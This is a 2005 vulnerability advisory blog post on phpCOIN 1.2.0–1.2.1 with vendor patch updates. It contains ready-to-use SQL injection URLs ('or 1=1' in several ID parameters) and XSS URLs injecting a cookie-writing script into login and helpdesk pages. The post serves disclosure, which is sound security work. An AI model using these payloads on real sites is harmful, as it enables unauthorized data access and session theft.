phpcoin posible sql injection comands and XSS

Tuesday, March 01, 2005
#############################################
phpcoin posible sql injection commands and XSS
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com/2005/03/
phpcoin-posible-sql-injection-comands.html
last updated 05/03/2005
OSVDB ID:15043,15044,15045,15046,15047,15048....
Secunia: SA14439
Securitytracker:1013329
#############################################


phpCOIN Is a free software package originally designed for web-hosting resellers to handle clients, orders, invoices,
notes and helpdesk, but no longer limited to hosting resellers.
Some variables are not properly validate and permits
sql injection commands and cross-site scripting attacks.

############
sql injection:
############

dislose some sql data...

http://[target]phpcoin/mod.php?mod=siteinfo&id=1'

ummm them ...

http://[target]phpcoin/mod.php?mod=faq
&mode=show&faq_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
pages&mode=view&id=25%20or%201=1

http://[target]phpcoin/mod.php?mod=
siteinfo&id=4%20or%201=1

http://[target]phpcoin/mod.php?mod=
articles&mode=list&dtopic_id=1%20or%201=1

http://[target]phpcoin/mod.php?mod=
orders&mode=view&ord_id=1002%20or%201=1

http://[target]phpcoin/mod.php?mod=
domains&mode=view&dom_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
invoices&mode=view&invc_id=1002%20or%201=1

for exploiting some flaws need a client or admin login

#################
cross site scripting
#################

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=admin&o=login
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

Other script are subceptibles to injection html or javascript code...

##################
versions afected :
##################

1.2.0
1.2.1b
1.2.1

##########
Solution :
##########
no solution was avaible at this time look for vendor information
or for new release versions.

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

######################
updated at 04/03/2005
######################

Today i recive a mail From a person who is worried
for their phpcoin servers, and a mail whith a vendor
respose where , he say ,is working for a fix and give
to me some code for look. Good !!

I decided delete the update post ,for no alarm any people.
any issue found is "critical"... but need to fix ... and
phpcoin vendor is working now for a fix you can look here :

http://forums.phpcoin.com/index.php?showtopic=4116

thnx Karl for your mail :)

#####################
Updated at 05/03/2005
#####################

phpCOIN vendor has released to me version 1.2.2
of phpCOIN i prove all issues and aparently all
now are pached , Good work !!

Solution:

wait for release the version and update your instalation.

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...